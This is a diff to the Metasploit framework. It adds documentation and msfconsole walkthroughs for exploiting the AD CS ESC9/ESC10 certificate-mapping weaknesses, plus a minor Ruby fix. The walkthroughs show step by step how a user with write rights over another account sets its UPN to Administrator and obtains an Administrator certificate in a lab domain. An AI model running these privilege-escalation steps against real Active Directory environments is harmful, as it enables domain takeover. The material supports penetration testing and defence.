rapid7
diff --git a/‎docs/metasploit-framework.wiki/ad-certificates/Attacking-AD-CS-ESC-Vulnerabilities.md
+182 b/‎docs/metasploit-framework.wiki/ad-certificates/Attacking-AD-CS-ESC-Vulnerabilities.md
+182
diff --git a/‎documentation/modules/auxiliary/gather/ldap_update_object.md
+77 b/‎documentation/modules/auxiliary/gather/ldap_update_object.md
+77
diff --git a/‎lib/msf/base/serializer/readable_text.rb
+1-1 b/‎lib/msf/base/serializer/readable_text.rb
+1-1
@@ -921,6 +921,188 @@ msf6 auxiliary(server/relay/esc8) >
 [*] Identity: MSFLAB\smcintyre - All targets relayed to
 ```
 
+# Overview of exploiting ESC9 and ESC10 with Metasploit
+
+ESC9 and ESC10 are similar certificate misconfiguration abuse techniques. They both involve having credentials of a
+user, say "user1", who has GenericWrite privileges over "user2". This allows an attacker as "user1" to update either the
+`userPrincipalName` or `dNSHostName` attribute of "user2".
+
+If the AD CS server is configured to allow "weak certificate mappings" when a user is requesting a certificate, the
+server will check the `userPrincipalName` or the `dNSHostName` of the requesting identity and then issue a certificate
+based on that value.  Therefore if we can update user2's UPN to Administrator and then request a certificate on
+behalf of user2 we can get an Administrator certificate (easy priv esc horay). That is the essence of both ESC9 and
+ESC10 minus a number of details we'll get into.
+
+It's also worth noting that the following registry keys and preventative measure and exploit techniques (ESC9 and 10) all stem from
+Microsoft attempts to patch CVE-2022–26923 (aka Certifried). During this effort they implemented the new
+`szOID_NTDS_CA_SECURITY_EXT` security extension for issued certificates, which will embed the `objectSid`
+property of the requester, to help facilitate "strong certificate mappings", along with the following registry keys
+and certificate template flags.
+
+## StrongCertificateBindingEnforcement
+Located in: `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Kdc`
+
+This registry key defines what is considered weak and strong certificate mappings for **Kerberos authentication**. Possible values:
+
+| Setting | Method                                                                                           | Strength assessment |
+| ------- | ------------------------------------------------------------------------------------------------ |---------------------|
+| 0       | No strong certificate mapping checks are done                                                    | weak                |
+| 1       | Will use strong mapping if present though can be ignored if CT_FLAG_NO_SECURITY_EXTENSION is set | weak                |
+| 2       | No weak mappings allowed                                                                         | strong              |
+|         |                                                                                                  |                     |
+
+In order to exploit these certificate misconfiguration we will need the value of  `StrongCertificateBindingEnforcement` to be either `0` or `1`.
+If the value is set to `2` we cannot exploit the misconfiguration using Kerberos authentication.
+
+## CertificateMappingMethods
+Located in: `HKLM\System\CurrentControlSet\Control\SecurityProviders\Schannel`
+
+This registry key defines what is considered weak and strong certificate mappings for **Schannel authentication**. Possible values:
+
+| Bit | Setting | Method                                | Strength assessment |
+| --- | ------- | ------------------------------------- | ------------------- |
+| 1   | 0x0001  | Subject/Issuer certificate mapping    | weak                |
+| 2   | 0x0002  | Issuer certificate mapping            | weak                |
+| 3   | 0x0004  | UPN certificate mapping               | weak                |
+| 4   | 0x0008  | S4U2Self certificate mapping          | strong              |
+| 5   | 0x0010  | S4U2Self explicit certificate mapping | strong              |
+| 1-5 | 0x001F  | All of the above values               | weak                |
+
+In order to exploit these certificate misconfiguration using Schannel authentication we will need the value of
+`CertificateMappingMethods` to be `UPN certificate mapping` (or `All the above values`)
+
+
+## CT_FLAG_NO_SECURITY_EXTENSION
+Certificate templates now include an attribute called `msPKI-Enrollment-Flag`. The `msPKI-Enrollment-Flag` attribute
+defines how certificate enrollment behaves by enabling or disabling specific behaviors via a bitmask of flags. If the
+attribute contains the value:`0x00080000` (aka `CT_FLAG_NO_SECURITY_EXTENSION`) then the `szOID_NTDS_CA_SECURITY_EXT`
+is not included and we can exploit weak certificate mappings even if `StrongCertificateBindingEnforcement` is set to 1.
+
+
+## Changing userPrincipalName vs dNSHostName
+Both can be used to exploit the certificate misconfiguration. It should be noted that normal users don't have a `dNSHostName`
+attribute, only machine accounts do.
+
+# Exploiting ESC9
+
+## ESC9 Scenario 1
+Pre-requisites:
+- `StrongCertificateBindingEnforcement` is set to `1` (if it's set to `0` exploitation will still work but techincally you're exploiting ESC10 in that case)
+- A vulnerable certificate template has the `CT_FLAG_NO_SECURITY_EXTENSION` flag set. 
+- The same vulnerable template has the `SubjectAltRequireUPN` flag set.
+- The same vulnerable template has a client authentication EKU
+- We have credentials of a user who has `GenericWrite` privileges over another user that can enroll in the vulnerable template
+
+```
+msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > run
+...
+[+] Template: ESC9-Template
+[*]   Distinguished Name: CN=ESC9-Template,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=kerberos,DC=issue
+[*]   Manager Approval: Disabled
+[*]   Required Signatures: 0
+[!]   Potentially vulnerable to: ESC9 (the template is in a vulnerable configuration but in order to exploit registry key StrongCertificateBindingEnforcement must not be set to 2)
+[*]   Notes:
+[*]     * ESC9: Template has msPKI-Enrollment-Flag set to 0x80000 (CT_FLAG_NO_SECURITY_EXTENSION) and specifies a client authentication EKU and user1 has write privileges over user2 and the template has a subjectAltName (UPN or DNS) requirement
+[*]  Certificate Template Write-Enabled SIDs:
+[*]     * S-1-5-21-2324486357-3075865580-3606784161-1602 (user1)
+[*]     * S-1-5-21-2324486357-3075865580-3606784161-1603 (user2)
+[*]     * S-1-5-11 (Authenticated Users)
+[*]   Certificate Template Enrollment SIDs:
+[*]     * S-1-5-21-2324486357-3075865580-3606784161-1602 (user1)
+[*]     * S-1-5-21-2324486357-3075865580-3606784161-1603 (user2)
+[*]     * S-1-5-11 (Authenticated Users)
+...
+```
+Now we can see the above template is possibly exploitable if the `StrongCertificateBindingEnforcement` is set to `1`. In 
+our case it is so we can proceed with exploitation. 
+
+We will set a number of datastore options in order to exploit ESC9
+in this scenario. We will set `RHOSTS` `CERT_TEMPLATE` `CA` as we normally would. `SMBUser`, `SMBPass` and `SMBDomain` 
+are the credentials of the user who has `GenericWrite` privileges over the `TARGET_USERNAME`.  In order to update the UPN of the
+target user we must connect to LDAP and so the datastore options `LDAPUsername`, `LDAPPassword` and `LDAPDomain`  are
+available however if they are left blank the SMB credentials will be use - note `LDAPRport` must be set in order to 
+connect however it defaults to 389.  
+
+The option `UPDATE_ESC9_ESC10_OBJECT` is an enum that can be set to either `userPrincipalName`  or `dNSHostName` and must be set in order to instruct the module to attempt to exploit ESC9 or ESC10.
+We will set `UPDATE_ESC9_ESC10_OBJECT` to `userPrincipalName` in this case and so we then must set `ALT_UPN` to `[email protected]` and `NEW_VALUE` to `Administrator`. 
+
+`NEW_VALUE` will be the updated value of either the `userPrincipalName` or `dNSHostName` attribute. It's important when updating the UPN to omit the domain suffix from the UPN to avoid conflicts with other UPNs in the domain, which by default all contain the suffix. 
+The UPN processing order will still allow the DC to map the UPN Administrator in our writable account to the actual administrator, making its impersonation possible.
+
+It's also important to note that after issuing the certificate we must revert the `userPrincipalName` of the `TARGET_USERNAME` back to the original value before attempting to use the certificate or the certificate will not work. 
+This is done automatically by the module. 
+
+In the following example, the ESC9-Template template is vulnerable to ESC9 and will yield a ticket for Administrator once complete. 
+
+```
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set rhosts 172.16.199.200
+rhosts => 172.16.199.200
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA kerberos-DC2-CA
+CA => kerberos-DC2-CA
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC9-Template
+CERT_TEMPLATE => ESC9-Template
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set smbuser user1
+smbuser => user1
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set smbpass N0tpassword!
+smbpass => N0tpassword!
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set smbdomain kerberos.issue
+smbdomain => kerberos.issue
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set target_username "user2"
+target_username => user2
+msf6 auxiliary(admin/dcerpc/icpr_cert) >
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set UPDATE_ESC9_ESC10_OBJECT userPrincipalName
+UPDATE_ESC9_ESC10_OBJECT => userPrincipalName
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set new_value Administrator
+new_value => Administrator
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set alt_upn [email protected]
+alt_upn => [email protected]
+msf6 auxiliary(admin/dcerpc/icpr_cert) > run
+[*] Running module against 172.16.199.200
+[+] 172.16.199.200:445 - ESC9 could be exploitable using Kerberos due to StrongCertificateBindingEnforcement being set to 1
+[+] 172.16.199.200:445 - ESC10 could be exploitable using Schannel due to CertificateMappingMethods allowing UPN certificate mapping
+[*] 172.16.199.200:445 - Registry Values Retrieved for ESC9 & ESC10: {:certificate_mapping_methods=>"4", :strong_certificate_binding_enforcement=>"1"}
+[*] 172.16.199.200:445 - Updating userPrincipalName of user2 to Administrator
+[*] 172.16.199.200:445 - Loading auxiliary/gather/ldap_update_object
+[*] 172.16.199.200:445 - Running auxiliary/gather/ldap_update_object
+[*] Connecting to LDAP on 172.16.199.200:389...
+[*] Searching for DN of target user user2...
+[+] Found target user DN: CN=user2,CN=Users,DC=kerberos,DC=issue
+[*] Attempting to update userPrincipalName for CN=user2,CN=Users,DC=kerberos,DC=issue to Administrator...
+[+] Successfully updated CN=user2,CN=Users,DC=kerberos,DC=issue's userPrincipalName to Administrator
+[+] 172.16.199.200:445 - The requested certificate was issued.
+[*] 172.16.199.200:445 - Certificate Policies:
+[*] 172.16.199.200:445 - Certificate UPN: [email protected]
+[*] 172.16.199.200:445 - Certificate stored at: /Users/jheysel/.msf4/loot/20250514124900_default_172.16.199.200_windows.ad.cs_534148.pfx
+[*] 172.16.199.200:445 - Reverting userPrincipalName of user2 back to user2
+[*] 172.16.199.200:445 - Loading auxiliary/gather/ldap_update_object
+[*] 172.16.199.200:445 - Running auxiliary/gather/ldap_update_object
+[*] Connecting to LDAP on 172.16.199.200:389...
+[*] Searching for DN of target user user2...
+[+] Found target user DN: CN=user2,CN=Users,DC=kerberos,DC=issue
+[*] Attempting to update userPrincipalName for CN=user2,CN=Users,DC=kerberos,DC=issue to user2...
+[+] Successfully updated CN=user2,CN=Users,DC=kerberos,DC=issue's userPrincipalName to user2
+[*] Auxiliary module execution completed
+```
+We can then use the `kerberos/get_ticket` module to gain a Kerberos ticket granting ticket (TGT) as the `Administrator`
+domain administrator. See the [Getting A Kerberos Ticket](#getting-a-kerberos-ticket) section for more information.
+
+
+## ESC9 Scenario 2
+Pre-requisites:
+- `StrongCertificateBindingEnforcement` is set to `1` (if it's set to `0` exploitation will still work but techincally you're exploiting ESC10 in that case)
+- A vulnerable certificate template has the `CT_FLAG_NO_SECURITY_EXTENSION` flag set.
+- The same vulnerable template has the `SubjectAltRequireDNS` flag set. <--- (Only difference between pre-requisites in scenario 1 and 2)
+- The same vulnerable template has a client authentication EKU
+- We have credentials of a user who has `GenericWrite` privileges over another user that can enroll in the vulnerable template
+
+The option `UPDATE_ESC9_ESC10_OBJECT` will now be set to `dNSHostName` and because only machine accounts have the `dNSHostName` attribute we will set our `TARGET_USER` to the machine account`Test1$` 
+We will be changing the `dNSHostName` of the machine account `Test1$` to `DC2.kerberos.issue` (`DC2` is the hostname of the domain controller) in hopes to impersonate the Domain Controller machine account.
+So `NEW_VALUE` as well as `ALT_DNS` will be set to `DC2.kerberos.issue`.  
+
+`CERT_TEMPLATE` will be set to `ESC9-Template-Dns` which is the same template as `ESC9-Template` but with the `SubjectAltRequireDNS` flag set instead of the `SubjectAltRequireUPN` flag.
+
+
+
 # Exploiting ESC13
 To exploit ESC13, we need to target a certificate that has an issuance policy linked to a universal group in Active
 Directory. Unlike some of the other ESC techniques, successfully exploiting ESC13 isn't necessarily guaranteed to yield
 
@@ -0,0 +1,77 @@
+## Description
+
+The `ldap_update_object` module allows users to update attributes of LDAP objects in an Active Directory environment.
+This module is flexible, enabling users to specify the target object and the attribute they wish to modify.
+
+## Verification Steps
+
+1. On the target host determine the current UPN value of the user you wish to update:
+```powershell
+PS C:\Users\Administrator> Get-ADUser -Identity user2 -Properties UserPrincipalName | Select-Object UserPrincipalName
+
+UserPrincipalName
+-----------------
+user2
+```
+1. Start `msfconsole`
+1. Do: `use auxiliary/gather/ldap_update_object`
+1. Do: `set RHOST [IP]`
+1. Do: `set LDAPDomain [DOMAIN]`
+1. Do: `set LDAPUsername [USERNAME]`
+1. Do: `set LDAPPassword [PASSWORD]`
+1. Do: `set TARGET_USERNAME [TARGET_USERNAME]`
+1. Do: `set ATTRIBUTE userPrincipalName`
+1. Do: `set NEW_VALUE Administrator`
+1. Do: `run`
+1. Verify the attribute has been updated successfully:
+```powershell
+PS C:\Users\Administrator> Get-ADUser -Identity user2 -Properties UserPrincipalName | Select-Object UserPrincipalName
+
+UserPrincipalName
+-----------------
+Administrator
+```
+
+## Options
+
+### TARGET_USERNAME
+The username of the target LDAP object whose attribute you want to update. This is used to locate the specific object in the LDAP directory.
+
+### ATTRIBUTE
+The LDAP attribute to update. For example, `userPrincipalName` can be used to update the User Principal Name of the target object.
+
+### NEW_VALUE
+The new value to assign to the specified attribute. For example, if updating the `userPrincipalName`, this would be the new UPN value, which might be `Administrator`
+
+## Scenarios
+### Update the userPrincipalName of user2 from "user2" to "Administrator" using user1's credentials (who has Write privileges over user2).
+
+```
+msf6 auxiliary(gather/ldap_update_object) > set attribute userPrincipalName
+attribute => userPrincipalName
+msf6 auxiliary(gather/ldap_update_object) > set ldapdomain kerberos.issue
+ldapdomain => kerberos.issue     
+msf6 auxiliary(gather/ldap_update_object) > set ldappassword N0tpassword!
+ldappassword => N0tpassword!
+msf6 auxiliary(gather/ldap_update_object) > set ldapusername user1
+ldapusername => user1
+msf6 auxiliary(gather/ldap_update_object) > set new_value Administrator
+new_value => Administrator
+msf6 auxiliary(gather/ldap_update_object) > set rhosts 172.16.199.200
+rhosts => 172.16.199.200
+msf6 auxiliary(gather/ldap_update_object) > set target_username user2
+target_username => user2
+msf6 auxiliary(gather/ldap_update_object) > run
+[*] Running module against 172.16.199.200
+[*] Connecting to LDAP on 172.16.199.200:389...
+[*] Searching for DN of target user user2...
+[+] Found target user DN: CN=user2,CN=Users,DC=kerberos,DC=issue
+[*] Attempting to update userPrincipalName for CN=user2,CN=Users,DC=kerberos,DC=issue to Administrator...
+[+] Successfully updated CN=user2,CN=Users,DC=kerberos,DC=issue's userPrincipalName to Administrator
+[*] Auxiliary module execution completed
+```
+
+## Notes
+
+- Ensure the user account used for authentication has sufficient privileges to modify the specified attribute.
+- Use caution when modifying LDAP attributes, as incorrect changes can disrupt directory services.
@@ -587,7 +587,7 @@ def self.dump_options(mod, indent = '', missing = false, advanced: false, evasio
       next if tbl.rows.empty?
 
       if conditions.any?
-        option_tables << "#{indent}When #{Msf::OptCondition.format_conditions(mod, options.first)}:\n\n#{tbl}"
+        option_tables << "#{indent}When #{Msf::OptCondition.format_conditions(conditions)}:\n\n#{tbl}"
       else
         option_tables << tbl.to_s
       end